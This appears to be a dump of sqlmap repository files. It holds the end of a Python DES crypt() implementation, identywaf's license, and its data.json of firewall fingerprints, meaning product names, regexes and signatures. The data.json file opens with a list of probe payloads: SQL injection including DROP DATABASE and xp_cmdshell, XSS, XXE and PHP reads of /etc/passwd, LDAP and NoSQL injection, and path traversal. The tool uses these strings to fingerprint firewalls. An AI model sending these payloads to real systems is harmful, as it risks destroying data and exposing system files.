0x25,0x26,0x27,0x28,0x29,0x2A,0x2B,0x2C,\n    0x2D,0x2E,0x2F,0x30,0x31,0x32,0x33,0x34,\n    0x35,0x36,0x37,0x38,0x39,0x3A,0x3B,0x3C,\n    0x3D,0x3E,0x3F,0x40,0x41,0x42,0x43,0x44 ]\n\n_cov_2char = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\n\n\ndef _HPERM_OP(a):\n    \"\"\"Clever bit manipulation.\"\"\"\n    t = ((a << 18) ^ a) & 0xcccc0000\n    return a ^ t ^ ((t >> 18) & 0x3fff)\n\ndef _PERM_OP(a,b,n,m):\n    \"\"\"Cleverer bit manipulation.\"\"\"\n    t = ((a >> n) ^ b) & m\n    b = b ^ t\n    a = a ^ (t << n)\n    return a,b\n\n\ndef _set_key(password):\n    \"\"\"Generate DES key schedule from ASCII password.\"\"\"\n\n    c,d = struct.unpack('<ii', password.encode(\"utf8\") if not isinstance(password, bytes) else password)\n    c = (c & 0x7f7f7f7f) << 1\n    d = (d & 0x7f7f7f7f) << 1\n\n    d,c = _PERM_OP(d,c,4,0x0f0f0f0f)\n    c = _HPERM_OP(c)\n    d = _HPERM_OP(d)\n    d,c = _PERM_OP(d,c,1,0x55555555)\n    c,d = _PERM_OP(c,d,8,0x00ff00ff)\n    d,c = _PERM_OP(d,c,1,0x55555555)\n\n    # Any sign-extended bits are masked off.\n    d = (((d & 0x000000ff) << 16) | (d & 0x0000ff00) |\n         ((d & 0x00ff0000) >> 16) | ((c >> 4) & 0x0f000000))\n    c = c & 0x0fffffff\n\n    # Copy globals into local variables for loop.\n    shifts2 = _shifts2\n    skbc0, skbc1, skbc2, skbc3, skbd0, skbd1, skbd2, skbd3 = _skb\n\n    k = [0] * (_ITERATIONS * 2)\n\n    for i in xrange(_ITERATIONS):\n        # Only operates on top 28 bits.\n        if shifts2[i]:\n            c = (c >> 2) | (c << 26)\n            d = (d >> 2) | (d << 26)\n        else:\n            c = (c >> 1) | (c << 27)\n            d = (d >> 1) | (d << 27)\n        c = c & 0x0fffffff\n        d = d & 0x0fffffff\n\n        s = ( skbc0[  c      & 0x3f                    ] |\n              skbc1[((c>> 6) & 0x03) | ((c>> 7) & 0x3c)] |\n              skbc2[((c>>13) & 0x0f) | ((c>>14) & 0x30)] |\n              skbc3[((c>>20) & 0x01) |\n                    ((c>>21) & 0x06) | ((c>>22) & 0x38)] )\n\n        t = ( skbd0[  d      & 0x3f                    ] |\n              skbd1[((d>> 7) & 0x03) | ((d>> 8) & 0x3c)] |\n              skbd2[((d>>15) & 0x3f)                   ] |\n              skbd3[((d>>21) & 0x0f) | ((d>>22) & 0x30)] )\n\n        k[2*i] = ((t << 16) | (s & 0x0000ffff)) & 0xffffffff\n        s = (s >> 16) | (t & 0xffff0000)\n\n        # Top bit of s may be 1.\n        s = (s << 4) | ((s >> 28) & 0x0f)\n        k[2*i + 1] = s & 0xffffffff\n\n    return k\n\n\ndef _body(ks, E0, E1):\n    \"\"\"Use the key schedule ks and salt E0, E1 to create the password hash.\"\"\"\n\n    # Copy global variable into locals for loop.\n    SP0, SP1, SP2, SP3, SP4, SP5, SP6, SP7 = _SPtrans\n\n    inner = xrange(0, _ITERATIONS*2, 2)\n    l = r = 0\n    for j in xrange(25):\n        l,r = r,l\n        for i in inner:\n            t = r ^ ((r >> 16) & 0xffff)\n            u = t & E0\n            t = t & E1\n            u = u ^ (u << 16) ^ r ^ ks[i]\n            t = t ^ (t << 16) ^ r ^ ks[i+1]\n            t = ((t >> 4) & 0x0fffffff) | (t << 28)\n\n            l,r = r,(SP1[(t    ) & 0x3f] ^ SP3[(t>> 8) & 0x3f] ^\n                     SP5[(t>>16) & 0x3f] ^ SP7[(t>>24) & 0x3f] ^\n                     SP0[(u    ) & 0x3f] ^ SP2[(u>> 8) & 0x3f] ^\n                     SP4[(u>>16) & 0x3f] ^ SP6[(u>>24) & 0x3f] ^ l)\n\n    l = ((l >> 1) & 0x7fffffff) | ((l & 0x1) << 31)\n    r = ((r >> 1) & 0x7fffffff) | ((r & 0x1) << 31)\n\n    r,l = _PERM_OP(r, l,  1, 0x55555555)\n    l,r = _PERM_OP(l, r,  8, 0x00ff00ff)\n    r,l = _PERM_OP(r, l,  2, 0x33333333)\n    l,r = _PERM_OP(l, r, 16, 0x0000ffff)\n    r,l = _PERM_OP(r, l,  4, 0x0f0f0f0f)\n\n    return l,r\n\n\ndef crypt(password, salt):\n    \"\"\"Generate an encrypted hash from the passed password.  If the password\nis longer than eight characters, only the first eight will be used.\n\nThe first two characters of the salt are used to modify the encryption\nalgorithm used to generate in the hash in one of 4096 different ways.\nThe characters for the salt should be upper- and lower-case letters A\nto Z, digits 0 to 9, '.' and '/'.\n\nThe returned hash begins with the two characters of the salt, and\nshould be passed as the salt to verify the password.\n\nExample:\n\n  >>> from fcrypt import crypt\n  >>> password = 'AlOtBsOl'\n  >>> salt = 'cE'\n  >>> hash = crypt(password, salt)\n  >>> hash\n  'cEpWz5IUCShqM'\n  >>> crypt(password, hash) == hash\n  1\n  >>> crypt('IaLaIoK', hash) == hash\n  0\n\nIn practice, you would read the password using something like the\ngetpass module, and generate the salt randomly:\n\n  >>> import random, string\n  >>> saltchars = string.ascii_letters + string.digits + './'\n  >>> salt = random.choice(saltchars) + random.choice(saltchars)\n\nNote that other ASCII characters are accepted in the salt, but the\nresults may not be the same as other versions of crypt.  In\nparticular, '_', '$1' and '$2' do not select alternative hash\nalgorithms such as the extended passwords, MD5 crypt and Blowfish\ncrypt supported by the OpenBSD C library.\n\"\"\"\n\n    # Extract the salt.\n    if len(salt) == 0:\n        salt = 'AA'\n    elif len(salt) == 1:\n        salt = salt + 'A'\n    Eswap0 = _con_salt[ord(salt[0]) & 0x7f]\n    Eswap1 = _con_salt[ord(salt[1]) & 0x7f] << 4\n\n    # Generate the key and use it to apply the encryption.\n    ks = _set_key((password + '\\0\\0\\0\\0\\0\\0\\0\\0')[:8])\n    o1, o2 = _body(ks, Eswap0, Eswap1)\n\n    # Extract 24-bit subsets of result with bytes reversed.\n    t1 = (o1 << 16 & 0xff0000) | (o1 & 0xff00) | (o1 >> 16 & 0xff)\n    t2 = (o1 >> 8 & 0xff0000) | (o2 << 8 & 0xff00) | (o2 >> 8 & 0xff)\n    t3 = (o2 & 0xff0000) | (o2 >> 16 & 0xff00)\n    # Extract 6-bit subsets.\n    r = [ t1 >> 18 & 0x3f, t1 >> 12 & 0x3f, t1 >> 6 & 0x3f, t1 & 0x3f,\n          t2 >> 18 & 0x3f, t2 >> 12 & 0x3f, t2 >> 6 & 0x3f, t2 & 0x3f,\n          t3 >> 18 & 0x3f, t3 >> 12 & 0x3f, t3 >> 6 & 0x3f ]\n    # Convert to characters.\n    for i in xrange(len(r)):\n        r[i] = _cov_2char[r[i]]\n    return salt[:2] + ''.join(r)\n\ndef _test():\n    \"\"\"Run doctest on fcrypt module.\"\"\"\n    import doctest, fcrypt\n    return doctest.testmod(fcrypt)\n\nif __name__ == '__main__':\n    _test()\n"
  },
  {
    "path": "sqlmap/thirdparty/identywaf/LICENSE",
    "content": "MIT License\n\nCopyright (c) 2019-2020 Miroslav Stampar\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n"
  },
  {
    "path": "sqlmap/thirdparty/identywaf/__init__.py",
    "content": "#!/usr/bin/env python\n#\n# Copyright (c) 2019-2021 Miroslav Stampar (@stamparm), MIT\n# See the file 'LICENSE' for copying permission\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\npass\n"
  },
  {
    "path": "sqlmap/thirdparty/identywaf/data.json",
    "content": "{\n    \"__copyright__\": \"Copyright (c) 2019-2021 Miroslav Stampar (@stamparm), MIT. See the file 'LICENSE' for copying permission\",\n    \"__notice__\": \"The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software\",\n\n    \"payloads\": [\n        \"HTML::<img>\",\n        \"SQLi::1 AND 1\",\n        \"SQLi::1/**/AND/**/1\",\n        \"SQLi::1/*0AND*/1\",\n        \"SQLi::1 AND 1=1\",\n        \"SQLi::1 AND 1 LIKE 1\",\n        \"SQLi::1 AND 1 BETWEEN 0 AND 1\",\n        \"SQLi::1 AND 2>(SELECT 1)-- -\",\n        \"SQLi::' OR SLEEP(5) OR '\",\n        \"SQLi::admin'-- -\",\n        \"SQLi::information_schema\",\n        \"SQLi::;DROP TABLE mysql.users\",\n        \"SQLi::';DROP DATABASE mysql#\",\n        \"SQLi::1/**/UNION/**/SELECT/**/1/**/FROM/**/information_schema.*\",\n        \"SQLi::SELECT id FROM users WHERE id>2\",\n        \"SQLi::1 UNION SELECT information_schema.*\",\n        \"SQLi::1;EXEC xp_cmdshell('type autoexec.bat');\",\n        \"SQLi::1;INSERT INTO USERS values('admin', 'foobar')\",\n        \"XSS::<img src=x onerror=alert('XSS')>\",\n        \"XSS::<img onfoo=f()>\",\n        \"XSS::<script>\",\n        \"XSS::<script>alert('XSS')</script>\",\n        \"XSS::\\\\\\\";alert('XSS');//\",\n        \"XSS::1' onerror=alert(String.fromCharCode(88,83,83))>\",\n        \"XSS::<![CDATA[<script>var n=0;while(true){n++;}</script>]]>\",\n        \"XSS::<meta http-equiv=\\\"refresh\\\" content=\\\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\">\",\n        \"XSS::javascript:alert(/XSS/)\",\n        \"XSS::<marquee onstart=alert(1)>\",\n        \"XPATHi::' and count(/*)=1 and '1'='1\",\n        \"XPATHi::count(/child::node())\",\n        \"XPATHi::' and count(/comment())=1 and '1'='1\",\n        \"XPATHi::' or '1'='1\",\n        \"XXE::<!ENTITY xxe SYSTEM \\\"file:///etc/passwd\\\" >]><foo>&xxe;</foo>\",\n        \"LDAPi::admin*)((|userpassword=*)\",\n        \"LDAPi::user=*)(uid=*))(|(uid=*\",\n        \"LDAPi::*(|(objectclass=*))\",\n        \"NOSQLi::true, $where: '1 == 1'\",\n        \"NOSQLi::{ $ne: 1 }\",\n        \"NOSQLi::' } ], $comment:'success'\",\n        \"PHPi::<?php include_once(\\\"/etc/passwd\\\"); ?>\",\n        \"ACE::netstat -antup | grep :443; ping 127.0.0.1; curl http://www.google.com\",\n        \"PT:://///.htaccess\",\n        \"PT::/etc/passwd\",\n        \"PT::../../boot.ini\",\n        \"PT::C:/inetpub/wwwroot/global.asa\"\n    ],\n    \"wafs\": {\n        \"360\": {\n            \"company\": \"360\",\n            \"name\": \"360\",\n            \"regex\": \"<title>493</title>|/wzws-waf-cgi/\",\n            \"signatures\": [\n                \"9778:RVZXum61OEhCWapBYKcPk4JzWOpohM4JiUcMr2RXg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4VmkwI3FZjxtDtAeq+c36A5chW1XaTC\",\n                \"9ccc:RVZXum61OEhCWapBYKcPk4JzWOpohM4JiUcMr2RXg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4VmkwI3FZjxtDtAeq+c36A4chW1XaTC\"\n            ]\n        },\n        \"aesecure\": {\n            \"company\": \"aeSecure\",\n            \"name\": \"aeSecure\",\n            \"regex\": \"aesecure_denied\\\\.png|aesecure-code: \\\\d+\",\n            \"signatures\": [\n                \"8a4b:RVdXu260OEhCWapBYKcPk4JzWOtohM4JiUcMrmRXg1uQJbX3uhdOn9htOj+hX7AB16FcPxJOdLsXo2tKaK99n+i7c4RmkgI2FZnxtDtBeq+c36A4chW1XaTD\"\n            ]\n        },\n        \"airlock\": {\n            \"company\": \"Phion/Ergon\",\n            \"name\": \"Airlock\",\n            \"regex\": \"The server detected a syntax error in your request\",\n            \"signatures\": [\n                \"3e2c:RVZXu261OEhCWapBYKcPk4JzWOtohM4IiUcMr2RXg1uQJbX3uhdOn9htOj+hX7AB16FcPxJPdLsXomtKaK59n+i6c4RmkwI2FZjxtDtAeq6c36A5chW1XaTD\"\n            ]\n        },\n        \"alertlogic\": {\n            \"company\": \"Alert Logic\",\n            \"name\": \"Alert Logic\",\n            \"regex\": \"(?s)timed_redirect\\\\(seconds, url\\\\).+?<p class=\\\"lid\\\">Reference ID:\",\n            \"signatures\": []\n        },\n        \"aliyundun\": {\n            \"company\": \"Alibaba Cloud Computing\",\n            \"name\": \"AliYunDun\",\n            \"regex\": \"Sorry, your request has been blocked as it may cause potential threats to the server's security|//errors\\\\.aliyun\\\\.com/\",\n            \"signatures\": [\n                \"e082:RVZXum61OElCWapAYKYPkoJzWOpohM4JiUYMr2RXg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC\"\n            ]\n        },\n        \"anquanbao\": {\n            \"company\": \"Anquanbao\",\n            \"name\": \"Anquanbao\",\n            \"regex\": \"/aqb_cc/error/\",\n            \"signatures\": [\n                \"c790:RVZXum61OElCWapAYKYPk4JzWOpohM4JiUYMr2RXg1uQJbX3uhdOn9hsOj+hXrAB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"d3d3:RVZXum61OElCWapAYKYPk4JzWOpohM4JiUYMr2RXg1uQJbX3uhdOn9hsOj+hXrAB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC\"\n            ]\n        },\n        \"approach\": {\n            \"company\": \"Approach\",\n            \"name\": \"Approach\",\n            \"regex\": \"Approach.+?Web Application (Firewall|Filtering)\",\n            \"signatures\": [\n                \"fef0:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c36A5chW1XKTD\"\n            ]\n        },\n        \"armor\": {\n            \"company\": \"Armor Defense\",\n            \"name\": \"Armor Protection\",\n            \"regex\": \"This request has been blocked by website protection from Armor\",\n            \"signatures\": [\n                \"03ec:RVZXum60OEhCWapBYKYPk4JzWOtohM4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq6c36A4chS1XaTC\",\n                \"1160:RVZXum60OEhCWapBYKYPk4JyWOtohM4IiUcMr2RWg1qQJbX3uhZOnthsOj6hXrAA16BcPhJOdLoXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\"\n            ],\n            \"note\": \"Uses SecureSphere (Imperva) (Reference: https://www.imperva.com/resources/case_studies/CS_Armor.pdf)\"\n        },\n        \"asm\": {\n            \"company\": \"F5 Networks\",\n            \"name\": \"Application Security Manager\",\n            \"regex\": \"The requested URL was rejected\\\\. Please consult with your administrator|security\\\\.f5aas\\\\.com\",\n            \"signatures\": [\n                \"2f81:RVZXum60OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hXrAB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI3FZjxtDtAeq+c36A4chS1XaTC\",\n                \"4fd0:RVZXum60OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtDtAeq6c3qA4chS1XaTC\",\n                \"5904:RVZXum60OEhCWapBYKcPk4JzWOpohc4IiUcMr2RWg1uQJbX3uhdOnthtOj+hXrAB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtTtAeq+c3qA4chS1XaTC\",\n                \"8bcf:RVZXum60OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtTtAeq6c36A5chS1XaTC\",\n                \"540f:RVZXum60OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtTtAeq+c36A5chS1XaTC\",\n                \"c7ba:RVZXum60OEhCWKpAYKYPkoJzWOpohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXomtLaK99n+i7c4VmkwI3FZjxtDtAeq6c3qA4chS1XaTC\",\n                \"fb21:RVZXum60OEhCWapBYKcPk4JzWOpohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI3FZjxtDtAeq+c36A5chW1XaTC\",\n                \"b6ff:RVZXum61OEhCWapBYKcPkoJzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtDtAeq+c36A4chW1XaTC\",\n                \"3b1e:RVZXum60OEhCWapBYKcPk4JyWOpohM4IiUcMr2RWg1qQJLX3uhdOnthtOj+hXrAB16FcPxJPdLsXo2tKaK99nui7c4RmkgI2FZjxtDtAeq6c3qA5chS1XKTC\",\n                \"620c:RVZXum60OEhCWapBYKcPkoJzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI2FZjxtDtAeq+c36A5chW1XaTC\",\n                \"b9a0:RVZXum60OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtDtAeq+c3qA4chW1XaTC\",\n                \"ccb6:RVdXum61OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtTtAeq+c36A5chW1XaTC\",\n                \"9138:RVZXum60OEhCWapBYKcPk4JzWOpohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtDtAeq6c3qA4chS1XaTC\",\n                \"54cc:RVZXum61OEhCWapBYKcPkoJzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtDtAeq6c3qA4chS1XaTC\",\n                \"4c83:RVZXum60OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4VmkwI3FZjxtDtAeq+c36A5chW1XaTC\",\n                \"8453:RVZXum60OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtDtAeq+c36A4chS1XaTC\"\n            ]\n        },\n        \"astra\": {\n            \"company\": \"Czar Securities\",\n            \"name\": \"Astra\",\n            \"regex\": \"(?s)unfortunately our website protection system.+?//www\\\\.getastra\\\\.com\",\n            \"signatures\": []\n        },\n        \"aws\": {\n            \"company\": \"Amazon\",\n            \"name\": \"AWS WAF\",\n            \"regex\": \"(?i)HTTP/1.+\\\\b403\\\\b.+\\\\s+Server: aws|(?s)Request blocked.+?Generated by cloudfront\",\n            \"signatures\": [\n                \"2998:RVZXu261OEhCWapBYKcPk4JzWOpohM4IiUcMr2RWg1uQJbX3uhZOnthsOj6hXrAA16BcPhJOdLoXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\",\n                \"fffa:RVZXum60OEhCWapAYKYPk4JyWOpohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPhJPdLsXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\",\n                \"9de0:RVZXu261OEhCWapBYKcPk4JzWOpohM4IiUcMr2RWg1uQJbX3uhZOnthtOj+hXrAA16BcPhJOdLoXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\",\n                \"34a8:RVZXu261OEhCWapBYKcPk4JzWOpohM4IiUcMr2RWg1uQJbX3uhdOn9htOj+hXrAB16BcPxJOdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\",\n                \"1104:RVZXum61OEhCWapBYKcPk4JzWOpohM4IiUcMr2RXg1uQJbX3uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\",\n                \"ea40:RVZXu261OEhCWapBYKcPk4JzWOtohM4IiUcMr2RWg1uQJbX3uhdOn9htOj+hXrAB16BcPxJOdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\"\n            ]\n        },\n        \"barracuda\": {\n            \"company\": \"Barracuda Networks\",\n            \"name\": \"Barracuda\",\n            \"regex\": \"\\\\bbarracuda_|barra_counter_session=|when this page occurred and the event ID found at the bottom of the page|<!--(0123456789){15}\",\n            \"signatures\": [\n                \"2676:RVdXum61OElCWapAYKYPk4JzWOtohM4JiUcMr2RWg1qQJbX3uhdOn9htOj+hXrAB16FcPxJPdLsXo2tKaK99n+i6c4VmkwI3FZjxtDtAeq6c36A4chS1XaTC\",\n                \"db27:RVdXum61OElCWapAYKYPk4JzWOtohM4JiUcMr2RWg1qQJbX3uhdOn9htOj+hXrAB16FcPxJPdLsXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XaTC\",\n                \"7e6b:RVdXum61OElCWapBYKYPk4JzWOtohM4JiUcMr2RXg1uQJbX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4VmkwI3FZjxtDtAeq+c36A4chS1XaTC\"\n            ]\n        },\n        \"bekchy\": {\n            \"company\": \"Faydata Information Technologies Inc.\",\n            \"name\": \"Bekchy\",\n            \"regex\": \"<title>Bekchy - Access Denided</title>|<a class=\\\"btn\\\" href=\\\"https://bekchy.com/report\\\">\",\n            \"signatures\": [\n                \"e1c5:RVZXum60OEhCWKpAYKYPk4JzWOtohc4IiUYMr2RWg1uQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\"\n            ]\n        },\n        \"bitninja\": {\n            \"company\": \"BitNinja\",\n            \"name\": \"BitNinja\",\n            \"regex\": \"alt=\\\"BitNinja|Security check by BitNinja|your IP will be removed from BitNinja|<title>Visitor anti-robot validation</title>\",\n            \"signatures\": []\n        },\n        \"bluedon\": {\n            \"company\": \"Bluedon\",\n            \"name\": \"Bluedon\",\n            \"regex\": \"Bluedon Web Application Firewall|Server: BDWAF\",\n            \"signatures\": []\n        },\n        \"bulletproof\": {\n            \"company\": \"AITpro Website Security\",\n            \"name\": \"BulletProof Security Pro\",\n            \"regex\": \"(?s)bpsMessage.+?403 Forbidden Error Page.+?If you arrived here due to a search or clicking on a link\",\n            \"signatures\": []\n        },\n        \"cdnns\": {\n            \"company\": \"CdnNs/WdidcNet\",\n            \"name\": \"CdnNsWAF\",\n            \"regex\": \"by CdnNsWAF Application Gateway\",\n            \"signatures\": [\n                \"5c5d:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RWg1uQJbX2uhdOnthtOj+hX7AB16FcPhJPdLsXo2tLaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chW1XaTC\"\n            ]\n        },\n        \"cerber\": {\n            \"company\": \"Cerber Tech\",\n            \"name\": \"WP Cerber Security\",\n            \"regex\": \"We're sorry, you are not allowed to proceed|Your request looks suspicious or similar to automated requests from spam posting software\",\n            \"signatures\": [\n                \"d8c2:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMr2RWg1uQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\"\n            ]\n        },\n        \"checkpoint\": {\n            \"company\": \"Check Point\",\n            \"name\": \"Next Generation Firewall\",\n            \"regex\": \"\",\n            \"signatures\": [\n                \"b771:RVZXum61OEhCWapAYKYPkoJzWOpohc4JiUYMr2RWg1uQJbX2uhdOnthsOj+hX7AB16BcPhJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"3b40:RVZXum60OEhCWapAYKYPkoJzWOpohM4IiUYMrmRWg1qQJLX2uhdOnthsOj+hX7AB16BcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XKTC\",\n                \"a332:RVZXum61OEhCWapAYKYPkoJzWOpohc4JiUYMr2RWg1uQJbX2uhdOnthsOj+hX7AB16BcPhJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC\",\n                \"a89b:RVZXum61OEhCWapAYKYPkoJzWOpohc4JiUYMr2RWg1uQJbX2uhdOnthsOj+hX7AB16BcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC\"\n            ]\n        },\n        \"chuangyu\": {\n            \"company\": \"Yunaq\",\n            \"name\": \"Chuang Yu Shield\",\n            \"regex\": \" \\\\d+\\\\.\\\\d+\\\\.\\\\d+\\\\.\\\\d+/[0-9a-f]{7} \\\\[\\\\d+\\\\] \",\n            \"signatures\": [\n                \"eda6:RVZXum61OElCWapAYKcPkoJzWOpohM4IiUYMr2RXg1uQJbX2uhdOn9htOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4VmkwI3FZjxtDtAeq+c36A5chW1XaTC\",\n                \"5bae:RVZXum61OElCWapAYKYPkoJzWOpohM4IiUYMr2RXg1uQJbX2uhdOn9htOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI2FZjxtDtAeq+c36A5chW1XaTC\"\n            ]\n        },\n        \"cloudbric\": {\n            \"company\": \"Cloudbric\",\n            \"name\": \"Cloudbric\",\n            \"regex\": \"Your request was blocked by Cloudbric\",\n            \"signatures\": [\n                \"514d:RVZXum60OEhCWapBYKcPk4JzWOtohM4JiUcMrmRXg1qQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\"\n            ]\n        },\n        \"cloudflare\": {\n            \"company\": \"CloudFlare\",\n            \"name\": \"CloudFlare\",\n            \"regex\": \"Attention Required! \\\\| Cloudflare|CLOUDFLARE_ERROR_\",\n            \"signatures\": [\n                \"956d:RVZXum60OEhCWapBYKcPkoJzWOpohM4IiUcMr2RXg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTC\",\n                \"6b42:RVZXum60OEhCWapBYKcPkoJzWOpohM4IiUcMr2RWg1uQJbX2uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTC\",\n                \"2295:RVZXum60OEhCWapBYKcPkoJzWOpohM4IiUcMr2RWg1uQJbX2uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTC\",\n                \"0d86:RVZXum60OEhCWapBYKcPkoJzWOpohM4IiUcMr2RWg1uQJbX2uhdOnthsOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTC\",\n                \"4849:RVZXum60OEhCWapBYKcPkoJzWOpohM4IiUcMrmRWg1uQJbX2uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTC\",\n                \"535c:RVZXum60OEhCWapBYKcPkoJzWOpohM4IiUYMr2RWg1uQJbX2uhdOnthtOj+hXrAB16FcPxJOdLoXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC\",\n                \"675a:RVZXum60OEhCWapBYKcPkoJzWOpohM4IiUcMrmRWg1uQJbX2uhdOnthsOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTC\",\n                \"4a45:RVZXum60OEhCWKpAYKYPkoJzWOpohM4IiUcMrmRWg1uQJLX2uhdOnthsOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c36A5chW1XaTC\",\n                \"1f29:RVZXum60OEhCWKpAYKYPkoJzWOpohM4IiUcMrmRWg1uQJLX2uhZOnthtOj+hXrAA16FcPhJOdLoXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC\",\n                